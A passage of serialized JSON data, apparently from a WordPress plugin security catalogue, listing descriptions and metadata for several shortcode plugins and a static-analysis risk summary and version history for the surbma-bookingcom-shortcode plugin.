href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fwordpress-plugins\u002Fshortcoder\u002F\" rel=\"nofollow ugc\">PRO version\u003C\u002Fa> which has additional features to further enhance the experience. Below features are offered in the PRO version.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Custom editor\u003C\u002Fstrong> – Edit Shortcode content using block editor or page builder plugins like Elementor and WPBakery.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>(New) Translation with WPML\u003C\u002Fstrong> – Translate Shortcode content with WPML.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Revisions\u003C\u002Fstrong> – Revisions support for Shortcode content.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Locate shortcode\u003C\u002Fstrong> – Search posts and pages where a shortcode is used.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Extra code\u003C\u002Fstrong> – Include extra code to the footer when a shortcode is used in a page.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fwordpress-plugins\u002Fshortcoder\u002F\" rel=\"nofollow ugc\">Get started with Shortcoder – PRO\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Links\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fdocs\u002Fshortcoder\u002F\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fdocs\u002Fshortcoder\u002Ffaq\u002F\" rel=\"nofollow ugc\">FAQs\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fforum\u002F\" rel=\"nofollow ugc\">Support forum\u002FReport bugs\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwww.aakashweb.com\u002Fwordpress-plugins\u002Fshortcoder\u002F#pro\" rel=\"nofollow ugc\">PRO features\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n","Create custom \"Shortcodes\" easily for HTML, JavaScript, CSS code snippets and use the shortcodes within posts, pages & widgets",100000,1903638,226,"2026-03-01T17:44:00.000Z","4.9.0","5.3",[132,133,134,20,135],"code","html","javascript","snippets","https:\u002F\u002Fwww.aakashweb.com\u002Fwordpress-plugins\u002Fshortcoder\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortcoder.6.5.2.zip",2,"2026-01-09 00:00:00",{"slug":141,"name":142,"version":143,"author":144,"author_profile":145,"description":146,"short_description":147,"active_installs":148,"downloaded":149,"rating":150,"num_ratings":151,"last_updated":152,"tested_up_to":153,"requires_at_least":154,"requires_php":155,"tags":156,"homepage":160,"download_link":161,"security_score":162,"vuln_count":13,"unpatched_count":13,"last_vuln_date":33,"fetched_at":26},"display-posts-shortcode","Display Posts – Easy lists, grids, navigation, and more","3.0.3","Bill Erickson","https:\u002F\u002Fprofiles.wordpress.org\u002Fbillerickson\u002F","\u003Cp>Display Posts allows you easily list content from all across your website. Start by adding this shortcode in the content editor to display a list of your most recent posts:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>[display-posts]\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>\u003Cstrong>Filter by Category\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>To only show posts within a certain category, use the category parameter:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>[display-posts category=\"news\"]\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>\u003Cstrong>Display as Post Grid\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>You can create a great looking, column-based grid of posts with a bit of styling. \u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002F2019\u002F01\u002F04\u002Fpost-grid-styling\u002F\" rel=\"nofollow ugc\">Here’s how!\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>List Popular Posts\u003C\u002Fstrong>\u003Cbr \u002F>\nYou can highlight your popular content in multiple ways. If you want to feature the posts with the most comments, use:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>[display-posts orderby=\"comment_count\"]\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>You can also list \u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002F2019\u002F01\u002F04\u002Fmost-popular-posts-by-social-shares\u002F\" rel=\"nofollow ugc\">most popular posts by social shares\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Include thumbnails, excerpts, and more\u003C\u002Fstrong>\u003Cbr \u002F>\nThe \u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Fdocs\u002Fparameters\u002F#display-parameters\" rel=\"nofollow ugc\">display parameters\u003C\u002Fa> let you control what information is displayed for each post. To include an image and summary, use:\u003C\u002Fp>\n\u003Cpre>\u003Ccode>[display-posts include_excerpt=\"true\" image_size=\"thumbnail\"]\n\u003C\u002Fcode>\u003C\u002Fpre>\n\u003Cp>You can use any image size added by WordPress (thumbnail, medium, medium_large, large) OR any custom image size added by your theme or other plugins.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Sort the list however you like\u003C\u002Fstrong>\u003Cbr \u002F>\nBy default the listing will list the newest content first, but you can order by title, menu order, relevance, content type, metadata, and more.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>List upcoming events\u003C\u002Fstrong>\u003Cbr \u002F>\nYou can easily list upcoming events from any event calendar. Each plugin will require slightly different code.\u003C\u002Fp>\n\u003Cp>Here are \u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Ftag\u002Fevents\u002F\" rel=\"nofollow ugc\">tutorials for popular event calendar plugins\u003C\u002Fa>. If your plugin is not listed here, submit a support request and I’ll add it!\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Tutorials\u003C\u002Fstrong>\u003Cbr \u002F>\n\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Ftutorials\u002F\" rel=\"nofollow ugc\">Our tutorials\u003C\u002Fa> cover common customization requests, and are updated often.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Full Documentation\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Fdocs\u002Fparameters\u002F#query-parameters\" rel=\"nofollow ugc\">Query parameters\u003C\u002Fa> for customizing which posts are listed (filter by category, tag, date…)\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Fdocs\u002Fparameters\u002F#display-parameters\" rel=\"nofollow ugc\">Display parameters\u003C\u002Fa> determine how the posts appear (title, excerpt, image…)\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002F2019\u002F01\u002F04\u002Fuse-template-parts-to-match-your-themes-styling\u002F\" rel=\"nofollow ugc\">Template parts\u003C\u002Fa> for Display Posts to perfectly match your theme’s post listings\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Fdocs\u002Fthe-output-filter\u002F\" rel=\"nofollow ugc\">Output filter\u003C\u002Fa> for complete control over how the listing looks on your site\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdisplayposts.com\u002Fdocs\u002Fparameters\u002F#display-parameters\" rel=\"nofollow ugc\">Filters\u003C\u002Fa> for even more powerful customizations for developers\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Extensions\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002FDisplay-Posts-Pagination\" rel=\"nofollow ugc\">Display Posts – Pagination\u003C\u002Fa> – Allow results of Display Posts to be paginated\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fdisplay-posts-date-view\u002F\" rel=\"ugc\">Display Posts – Date View\u003C\u002Fa> – Lets you break your content down by month or year.\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002FDisplay-Posts-Alpha-View\" rel=\"nofollow ugc\">Display Posts – Alpha View\u003C\u002Fa> – Display an alphabetical listing of your content, broken down by letter\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002FDisplay-Posts-Transient-Cache\" rel=\"nofollow ugc\">Display Posts – Transient Cache\u003C\u002Fa> – Cache the output using transients\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002Fdps-coauthor-addon\" rel=\"nofollow ugc\">Co-Authors Plus Addon\u003C\u002Fa> – multiple authors on posts\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002Fdps-columns-extension\" rel=\"nofollow ugc\">Columns Extension\u003C\u002Fa> – display posts in columns\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fbillerickson\u002FDPS-Exclude-Sticky\" rel=\"nofollow ugc\">DPS Exclude Sticky\u003C\u002Fa> – exclude sticky posts unless specifically requested\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fshazahm1\u002FDisplay-Posts-Shortcode-Pinch-Zoomer\" rel=\"nofollow ugc\">DPS Pinch Zoomer\u003C\u002Fa> – adds support pinch zooming post images on mobile devices and mouse wheel zooming on desktops\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fshazahm1\u002FDisplay-Posts-Shortcode-Remote\" rel=\"nofollow ugc\">Display Posts Shortcode Remote\u003C\u002Fa> – display posts from a remote WordPress site utilizing the WP REST API.\u003C\u002Fli>\n\u003C\u002Ful>\n","Add a listing of content on your website using a simple shortcode. Filter the results by category, author, and more.",80000,1254585,96,164,"2024-10-14T16:53:00.000Z","6.6.5","3.0","",[157,158,84,159,20],"page","pages","query","https:\u002F\u002Fdisplayposts.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdisplay-posts-shortcode.3.0.3.zip",92,{"slug":164,"name":165,"version":166,"author":167,"author_profile":168,"description":169,"short_description":170,"active_installs":171,"downloaded":172,"rating":173,"num_ratings":174,"last_updated":175,"tested_up_to":176,"requires_at_least":177,"requires_php":155,"tags":178,"homepage":183,"download_link":184,"security_score":101,"vuln_count":47,"unpatched_count":13,"last_vuln_date":185,"fetched_at":26},"wp-show-posts","WP Show Posts","1.1.6","Tom","https:\u002F\u002Fprofiles.wordpress.org\u002Fedge22\u002F","\u003Ch4>Note\u003C\u002Fh4>\n\u003Cp>This plugin is only receiving security updates at this time. Check out our \u003Ca href=\"https:\u002F\u002Fgenerateblocks.com\u002F\" rel=\"nofollow ugc\">GenerateBlocks\u003C\u002Fa> plugin for a more modern solution.\u003C\u002Fp>\n\u003Cp>\u003Ciframe loading=\"lazy\" title=\"WP Show Posts\" src=\"https:\u002F\u002Fplayer.vimeo.com\u002Fvideo\u002F175638957?dnt=1&app_id=122963\" width=\"750\" height=\"422\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture; clipboard-write\">\u003C\u002Fiframe>\u003C\u002Fp>\n\u003Cp>WP Show Posts allows you to display posts anywhere on your website using an easy to use shortcode.\u003C\u002Fp>\n\u003Cp>You can pull posts from any post type like WooCommerce, Easy Digital Downloads etc..\u003C\u002Fp>\n\u003Cp>This plugin works with any theme.\u003C\u002Fp>\n\u003Cp>Here are the features in the free version:\u003C\u002Fp>\n\u003Ch4>Posts\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Post type\u003C\u002Fli>\n\u003Cli>Taxonomy\u003C\u002Fli>\n\u003Cli>Terms\u003C\u002Fli>\n\u003Cli>Posts per page\u003C\u002Fli>\n\u003Cli>Pagination\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Columns\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Columns\u003C\u002Fli>\n\u003Cli>Columns gutter\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Images\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Show images\u003C\u002Fli>\n\u003Cli>Image width\u003C\u002Fli>\n\u003Cli>Image height\u003C\u002Fli>\n\u003Cli>Image alignment\u003C\u002Fli>\n\u003Cli>Image location\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Content\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Content type (excerpt or full post)\u003C\u002Fli>\n\u003Cli>Excerpt length\u003C\u002Fli>\n\u003Cli>Include title\u003C\u002Fli>\n\u003Cli>Read more text\u003C\u002Fli>\n\u003Cli>Read more button class\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Meta\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Include author\u003C\u002Fli>\n\u003Cli>Author location\u003C\u002Fli>\n\u003Cli>Include date\u003C\u002Fli>\n\u003Cli>Date location\u003C\u002Fli>\n\u003Cli>Include terms\u003C\u002Fli>\n\u003Cli>Terms location\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>More settings\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Author ID\u003C\u002Fli>\n\u003Cli>Exclude current\u003C\u002Fli>\n\u003Cli>Post ID\u003C\u002Fli>\n\u003Cli>Exclude post ID\u003C\u002Fli>\n\u003Cli>Ignore sticky posts\u003C\u002Fli>\n\u003Cli>Offset\u003C\u002Fli>\n\u003Cli>Order\u003C\u002Fli>\n\u003Cli>Order by\u003C\u002Fli>\n\u003Cli>Status\u003C\u002Fli>\n\u003Cli>Meta key\u003C\u002Fli>\n\u003Cli>Meta value\u003C\u002Fli>\n\u003Cli>Tax operator\u003C\u002Fli>\n\u003Cli>No results message\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Our *Pro* version has these features\u003C\u002Fh4>\n\u003Cp>\u003Ciframe loading=\"lazy\" title=\"WP Show Posts Pro\" src=\"https:\u002F\u002Fplayer.vimeo.com\u002Fvideo\u002F175660953?dnt=1&app_id=122963\" width=\"750\" height=\"422\" frameborder=\"0\" allow=\"autoplay; fullscreen; picture-in-picture; clipboard-write\">\u003C\u002Fiframe>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwpshowposts.com\u002F\" title=\"Check out Pro\" rel=\"nofollow ugc\">Check out Pro\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch4>Posts\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>AJAX pagination\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Columns\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Masonry\u003C\u002Fli>\n\u003Cli>Featured post\u003C\u002Fli>\n\u003Cli>Background color\u003C\u002Fli>\n\u003Cli>Background color hover\u003C\u002Fli>\n\u003Cli>Border color\u003C\u002Fli>\n\u003Cli>Border color hover\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Images\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Image overlay color\u003C\u002Fli>\n\u003Cli>Image overlay icon\u003C\u002Fli>\n\u003Cli>Image hover effect\u003C\u002Fli>\n\u003Cli>Image lightbox\u003C\u002Fli>\n\u003Cli>Image lightbox gallery\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Content\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Read more style\u003C\u002Fli>\n\u003Cli>Read more color\u003C\u002Fli>\n\u003Cli>Content link color\u003C\u002Fli>\n\u003Cli>Content link color hover\u003C\u002Fli>\n\u003Cli>Content text color\u003C\u002Fli>\n\u003Cli>Title color\u003C\u002Fli>\n\u003Cli>Title color hover\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Meta\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Meta color\u003C\u002Fli>\n\u003Cli>Meta color hover\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Social\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Twitter\u003C\u002Fli>\n\u003Cli>Twitter color + hover\u003C\u002Fli>\n\u003Cli>Facebook\u003C\u002Fli>\n\u003Cli>Facebook color + hover\u003C\u002Fli>\n\u003Cli>Google+\u003C\u002Fli>\n\u003Cli>Google+ color + hover\u003C\u002Fli>\n\u003Cli>Pinterest\u003C\u002Fli>\n\u003Cli>Pinterest color + hover\u003C\u002Fli>\n\u003Cli>Love it\u003C\u002Fli>\n\u003Cli>Alignment\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Check out GeneratePress, our awesome WordPress theme! (https:\u002F\u002Fwordpress.org\u002Fthemes\u002Fgeneratepress)\u003C\u002Fp>\n","Add posts to your website from any post type using a simple shortcode.",70000,606130,94,80,"2024-04-16T19:12:00.000Z","6.1.10","4.5",[141,179,180,181,182],"gallery","portfolio","post-columns","show-posts","https:\u002F\u002Fwpshowposts.com","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-show-posts.1.1.6.zip","2024-04-16 00:00:00",{"attackSurface":187,"codeSignals":200,"taintFlows":207,"riskAssessment":208,"analyzedAt":218},{"hooks":188,"ajaxHandlers":193,"restRoutes":194,"shortcodes":195,"cronEvents":199,"entryPointCount":24,"unprotectedCount":13},[189],{"type":190,"name":191,"callback":192,"file":44,"line":102},"action","init","closure",[],[],[196],{"tag":197,"callback":192,"file":44,"line":198},"surbma-bookingcom",27,[],{"dangerousFunctions":201,"sqlUsage":202,"outputEscaping":204,"fileOperations":13,"externalRequests":13,"nonceChecks":13,"capabilityChecks":13,"bundledLibraries":206},[],{"prepared":13,"raw":13,"locations":203},[],{"escaped":24,"rawEcho":13,"locations":205},[],[],[],{"summary":209,"deductions":210},"The surbma-bookingcom-shortcode plugin v2.1.1 presents a mixed security posture.  On the positive side, the static analysis reveals strong adherence to secure coding practices. There are no dangerous functions used, all SQL queries utilize prepared statements, and all identified output is properly escaped. Furthermore, the absence of file operations and external HTTP requests reduces potential attack vectors.  However, a significant concern is the complete lack of nonce checks and capability checks across all entry points. While the current static analysis reports zero unprotected entry points, this is likely due to the limited scope of entry points identified (only one shortcode) and doesn't negate the inherent risk of unprotected functionality if new entry points were added or if the single shortcode's execution context could be manipulated without authentication.\n\nThe vulnerability history indicates a past medium-severity Cross-Site Scripting (XSS) vulnerability. Although there are no currently unpatched CVEs, the existence of a past XSS issue, even if resolved, suggests potential weaknesses in input sanitization or output escaping that could resurface if not carefully maintained. The fact that the last vulnerability was dated 2026-04-13 also raises a red flag, implying the data might be from a future perspective or contain an error, making it difficult to assess the current state of ongoing maintenance. The current version appears to be patched concerning past vulnerabilities, but the lack of robust authentication and authorization checks for its single entry point remains a notable weakness.",[211,214,216],{"reason":212,"points":213},"Missing nonce checks on entry points",8,{"reason":215,"points":213},"Missing capability checks on entry points",{"reason":217,"points":11},"Past medium-severity XSS vulnerability","2026-04-16T12:29:47.220Z",{"wat":220,"direct":226},{"assetPaths":221,"generatorPatterns":222,"scriptPaths":223,"versionParams":225},[],[],[224],"https:\u002F\u002Fwww.booking.com\u002Fgeneral.html",[],{"cssClasses":227,"htmlComments":228,"htmlAttributes":229,"restEndpoints":230,"jsGlobals":231,"shortcodeOutput":232},[],[],[],[],[],[233],"\u003Cscript type=\"text\u002Fjavascript\" src=\"",{"slug":4,"current_version":6,"total_versions":235,"versions":236},5,[237,243,251,259,267],{"version":6,"download_url":22,"svn_tag_url":238,"released_at":33,"has_diff":46,"diff_files_changed":239,"diff_lines":33,"trac_diff_url":240,"vulnerabilities":241,"is_current":242},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F2.1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F2.0&new_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F2.1.1",[],true,{"version":244,"download_url":245,"svn_tag_url":246,"released_at":33,"has_diff":46,"diff_files_changed":247,"diff_lines":33,"trac_diff_url":248,"vulnerabilities":249,"is_current":46},"2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.2.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F2.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F1.1.0&new_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F2.0",[250],{"id":29,"url_slug":30,"title":31,"severity":35,"cvss_score":36,"vuln_type":38,"patched_in_version":6},{"version":252,"download_url":253,"svn_tag_url":254,"released_at":33,"has_diff":46,"diff_files_changed":255,"diff_lines":33,"trac_diff_url":256,"vulnerabilities":257,"is_current":46},"1.1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.1.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F1.1.0\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F1.0.3&new_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F1.1.0",[258],{"id":29,"url_slug":30,"title":31,"severity":35,"cvss_score":36,"vuln_type":38,"patched_in_version":6},{"version":260,"download_url":261,"svn_tag_url":262,"released_at":33,"has_diff":46,"diff_files_changed":263,"diff_lines":33,"trac_diff_url":264,"vulnerabilities":265,"is_current":46},"1.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.1.0.3.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F1.0.3\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F1.0.2&new_path=%2Fsurbma-bookingcom-shortcode%2Ftags%2F1.0.3",[266],{"id":29,"url_slug":30,"title":31,"severity":35,"cvss_score":36,"vuln_type":38,"patched_in_version":6},{"version":268,"download_url":269,"svn_tag_url":270,"released_at":33,"has_diff":46,"diff_files_changed":271,"diff_lines":33,"trac_diff_url":33,"vulnerabilities":272,"is_current":46},"1.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsurbma-bookingcom-shortcode.1.0.2.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fsurbma-bookingcom-shortcode\u002Ftags\u002F1.0.2\u002F",[],[273],{"id":29,"url_slug":30,"title":31,"severity":35,"cvss_score":36,"vuln_type":38,"patched_in_version":6}]